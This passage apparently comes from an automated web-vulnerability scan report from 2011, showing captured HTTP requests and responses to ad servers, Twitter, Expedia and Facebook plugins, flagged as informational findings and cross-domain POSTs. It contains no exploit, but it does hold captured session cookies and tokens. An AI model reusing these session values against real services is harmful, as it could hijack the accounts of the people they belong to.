Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201; guest_id=130796296639680752; original_referer=Bm9gjDJKLkNUA6KUQhqcURlVnkat6%2FAa0nQJRijFpP696HbzgOR%2BrPDoOcSsLUsQqgRs7aQNlpGXT0Ue1ThS%2BnB2T6v43msK; external_referer=Bm9gjDJKLkNUA6KUQhqcURlVnkat6%2FAa0nQJRijFpP696HbzgOR%2BrPDoOcSsLUsQqgRs7aQNlpGXT0Ue1ThS%2BnB2T6v43msK%7C0; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIoBq4gwAToHaWQiJTY3MzNhYWQwMGYwZGZh%250AM2RjMzRjNGI0YmM4ODI3OGQ2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e8cfadc4dddd72c57b26f1ed5cab8aa85cb06060

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:03:37 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1307963017-68258-33474
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 13 Jun 2011 11:03:37 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 7a768145158ba789d6c9ec7692e0c76795a27c13
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIoBq4gwAToHaWQiJTY3MzNhYWQwMGYwZGZh%250AM2RjMzRjNGI0YmM4ODI3OGQ2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e8cfadc4dddd72c57b26f1ed5cab8aa85cb06060; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 9854
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta content="noarchive,noindex" name="robots" />
<title>Twitter / ?</title>
<link href="//si0.twimg.com/sticky/error_pages/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<style type="text/css">
* { border: 0; padding: 0; margin: 0; }
body{ margin: 10px 0; background:#C0DEED url(//si0.twimg.com/sticky/error_pages/bg-clouds.png) repeat-x; color:#333; font: 12px Lucida Grande, Arial, sans-serif; text-align:center }
#container { width: 755px; margin: 0 auto; padding: 0px 0; text-align: left; position: relative; }
#content { width: 100%; margin-top: 8px; float: left; padding-bottom: 15px; background: transparent url(//si0.twimg.com/sticky/error_pages/arr2.gif) no-repeat scroll 21px 0px;}
.subpage #content .wrapper { background: #fff url(//si0.twimg.com/sticky/error_pages/not-found.png) no-repeat 565px 16px; -moz-border-radius: 5px; -webkit-border-radius: 5px; padding: 10px 0;}
.subpage #content h2 { margin: 5px 20px; font: bold 26px Helvetica Neue, Helvetica, Arial, sans-serif; *padding-bottom: 10px; }
.subpage #content p { margin: 0 20px 10px 20px; color: #666; font-size: 13px;}
.subpage #content ul { padding-left: 30px; }
.subpage #content ol, #side ol
...[SNIP]...

16.5. http://tag.admeld.com/ad/js/195/fsv/728x90/ros previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tag.admeld.com
Path:	/ad/js/195/fsv/728x90/ros

Request 1

Response 1

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1000
Content-Type: application/javascript
Date: Mon, 13 Jun 2011 11:01:33 GMT
Connection: close
Set-Cookie: D41U=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA; expires=Mon, 11-Jul-2011 11:01:33 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write("<div style='width:728px,height:90px;margin:0;border:0'>");

document.write(unescape('%3Ciframe%20frameborder%3D%220%22%20height%3D%2290%22%20width%3D%22728%22%20scrolling%3D%22no%22%20marginwidth%3D%220%22%20marginheight%3D%220%22%20src%3D%22http%3A%2F%2Fbn.xp1.ru4.com%2Fnf%3F_pnot%3D0%26_tpc%3D%26_wp%3D1.61%26_nv%3D1%26_CDbg%3D18121040%26_eo%3D52787%26_sm%3D268435456%26_nm%3DFgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2JjNDdjNGQtYmRlNy00NDYyLWEyZDItNjY1NjkyMDU5YWYzAAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA%3D%22%3E%3C%2Fiframe%3E'));

document.write("</div>");

Request 2

GET /ad/js/195/fsv/728x90/ros?01AD=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA&01RI=D54777EA22B9F46&01NA=&url= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; D41U=CT-1

Response 2

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1412
Content-Type: application/javascript
Date: Mon, 13 Jun 2011 11:01:38 GMT
Connection: close
Set-Cookie: D41U=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA; expires=Mon, 11-Jul-2011 11:01:38 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write("<div style='width:728px,height:90px;margin:0;border:0'>");

document.write(unescape('%3C%21--%20%20Rubicon%20Project%20Tag%20--%3E%0A%3C%21--%20%20Site%3A%20Big%20Lead%20Sports%20%20%20Zone%3A%20Fantasy_Sports_Ventures_Non_Expandable%20%20%20Size%3A%20Leaderboard%20%20--%3E%0A%3Cscript%20language%3D%22JavaScript%22%20type%3D%22text%2Fjavascript%22%3E%0Avar%20cb%20%3D%20Math.random%28%29%3B%0Avar%20d%20%3D%20document%3B%0Avar%20ref%20%3D%20%22%22%3B%0Atry%20%7B%0A%20%20%20%20if%20%28%28window%20%21%3D%20top%29%20%26%26%20%28window.parent%20%3D%3D%20top%29%29%20%7B%0A%20%20%20%20%20%20%20%20ref%20%3D%20%22%26rf%3D%22%2Bescape%28d.referrer%29%3B%0A%20%20%20%20%7D%0A%7D%20catch%20%28ignore%29%20%7B%20%7D%0Ad.write%28%27%3Cscript%20language%3D%22JavaScript%22%20type%3D%22text%2Fjavascript%22%27%29%3B%0Ad.write%28%27src%3D%22http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F5941%2F13464%2F26379-2.js%3Fcb%3D%27%2Bcb%2Bref%2B%27%22%3E%27%29%3B%0Ad.write%28%27%3C%5C%2Fscr%27%2B%27ipt%3E%27%29%3B%0A%3C%2Fscript%3E%0A%3Cnoscript%3E%0A%3Ca%20href%3D%22http%3A%2F%2Foptimized-by.rubiconproject.com%2Ft%2F5941%2F13464%2F26379-2.1%22%3E%3Cimg%20src%3D%22http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F5941%2F13464%2F26379-2.img%22%20width%3D%22728%22%20height%3D%2290%22%20border%3D%220%22%3E%3C%2Fa%3E%0A%3C%2Fnoscript%3E'));

document.write("</div>");

16.6. http://www.apture.com/js/apture.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.apture.com
Path:	/js/apture.js

Request 1

Response 1

HTTP/1.0 200 OK
Expires: Mon, 13 Jun 2011 11:22:33 GMT
Last-Modified: Mon, 13 Jun 2011 11:22:33 GMT
Etag: "b0eefd6122682fc2642cac4446e3e35f"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Content-Length: 1558
Date: Mon, 13 Jun 2011 11:22:33 GMT

(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/";A.visitId=249274762613433;A.abtests={};A.userCookieId="s4te21hWKP";
A.aptureConfig = {
magicLinks: {"status":207,"mlinks":[]}
};
A.siteToken="P5fUrvb";

A.capabilities=2052;
A.getPage=function(){return apture.make("Page", {ignored:{},tmmLinks:[],id:343348986,links:[],timestamp:1307948285.0});};
A.siteId=79096;
A.maxPageLinks=200;
A.platformName="WordpressCom";
A.platformId=8;

A.siteSearchUrls=["http://tunedin.blogs.time.com/"];

A.applyShading=1;

A.baked=1;
A.auto=1;

A.isApp=1;
//License terms: http://www.apture.com/license/
if(!B){ (function(s){var b=eval("(/*@cc_on!@*/0?(window.XMLHttpRequest/*@cc_on&&@_jscript_version>=5.7@*/?'ie7':null):(window.navigator.userAgent.toLowerCase().search(/iphone|ipad|android/)>-1)?null:(document.childNodes&&!document.all&&!navigator.taintEnabled)?'khtml':(document.getBoxObjectFor||(window.mozInnerScreenX===0||window.mozInnerScreenX))?'gecko':'unk')");if(b){s.type='text/javascript';s.charset='utf-8';s.src="http://cdn.apture.com/media/storage."+b+".v33513556.js";s.defer='true';(document.getElementsByTagName("head").item(0)||document.body).appendChild(s)}})(document.createElement('script')) }
else if(A.initApp)A.initApp();

}else{var i = A.prefs;
if(i&&(i.created||i.editing))alert("This page has multiple Apture script tags in the HTML template. Please remove all but one of them.")
}})();

Request 2

GET /js/apture.js?siteToken=P5fUrvb&ver=wpcom HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=s4te21hWKP

Response 2

HTTP/1.0 200 OK
Expires: Mon, 13 Jun 2011 11:22:35 GMT
Last-Modified: Mon, 13 Jun 2011 11:22:35 GMT
Etag: "5965a405ac815dd88e8eccaec23d05e2"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Content-Length: 1416
Date: Mon, 13 Jun 2011 11:22:35 GMT

(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="";A.visitId=97638930849192;A.abtests={};A.userCookieId="s4te21hWKP";
A.aptureConfig = {
magicLinks: {"status":207,"mlinks":[]}
};
A.siteToken="P5fUrvb";

A.capabilities=2052;
A.getPage=function(){return apture.make("Page", {tmmLinks:[],id:0});};
A.siteId=79096;
A.maxPageLinks=200;
A.platformName="WordpressCom";
A.platformId=8;

A.siteSearchUrls=["http://tunedin.blogs.time.com/"];

A.applyShading=1;

A.baked=1;
A.auto=1;

A.isApp=1;
//License terms: http://www.apture.com/license/
if(!B){ (function(s){var b=eval("(/*@cc_on!@*/0?(window.XMLHttpRequest/*@cc_on&&@_jscript_version>=5.7@*/?'ie7':null):(window.navigator.userAgent.toLowerCase().search(/iphone|ipad|android/)>-1)?null:(document.childNodes&&!document.all&&!navigator.taintEnabled)?'khtml':(document.getBoxObjectFor||(window.mozInnerScreenX===0||window.mozInnerScreenX))?'gecko':'unk')");if(b){s.type='text/javascript';s.charset='utf-8';s.src="http://cdn.apture.com/media/storage."+b+".v33513556.js";s.defer='true';(document.getElementsByTagName("head").item(0)||document.body).appendChild(s)}})(document.createElement('script')) }
else if(A.initApp)A.initApp();

}else{var i = A.prefs;
if(i&&(i.created||i.editing))alert("This page has multiple Apture script tags in the HTML template. Please remove all but one of them.")
}})();

16.7. http://www.expedia.com/hotel.h892034.Hotel-Information previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.expedia.com
Path:	/hotel.h892034.Hotel-Information

Request 1

Response 1

Request 2

GET /hotel.h892034.Hotel-Information?chkin=7/14/2011&chkout=7/18/2011&rm1=a2&hashTag=default&mcicid=112321680 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; SSLB=1; ipsnf3=v.3|US|1|511|washington

Response 2

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:29:39 GMT
Connection: close
Set-Cookie: SSRT1=ovT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:29:38 GMT

16.8. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Request 1

GET /extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=0&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.234.50
X-Cnection: close
Date: Mon, 13 Jun 2011 11:24:10 GMT
Content-Length: 1108

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"ugo.com","channel":"http:\/\/www.ugo.com\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":"http:\/\/www.ugo.com\/tv\/game-of-thrones-baelor-preview","session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

Request 2

GET /extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=0&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.229.42
X-Cnection: close
Date: Mon, 13 Jun 2011 11:25:06 GMT
Content-Length: 1054

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"ugo.com","channel":"http:\/\/www.ugo.com\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":null,"session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

16.9. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Request 1

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response 1

Request 2

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response 2

16.10. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFanSided%2F108254959223467&layout=button_count&show_faces=false&width=84&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFanSided%2F108254959223467&layout=button_count&show_faces=false&width=84&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

16.11. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Request 1

GET /plugins/likebox.php?id=108254959223467&width=525&connections=20&stream=false&header=false&height=155 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

Request 2

GET /plugins/likebox.php?id=108254959223467&width=525&connections=20&stream=false&header=false&height=155 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

16.12. http://www.facebook.com/widgets/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/widgets/like.php

Request 1

GET /widgets/like.php?width=280&show_faces=1&layout=standard&href=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0944947%2F HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0944947/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response 1

Request 2

GET /widgets/like.php?width=280&show_faces=1&layout=standard&href=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0944947%2F HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response 2

17. Cross-domain POST previous next
There are 12 instances of this issue:

http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us
http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us
http://www.mavsmoneyball.com/fanposts
http://www.mavsmoneyball.com/fanposts
http://www.mavsmoneyball.com/mavericks-tickets
http://www.mavsmoneyball.com/mavericks-tickets
http://www.nba.com/mavericks/index_main.html
http://www.nba.com/mavericks/index_main.html

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

17.1. http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportdfw.com
Path:	/2011/06/13/10-observations-dallas-mavs-finals/

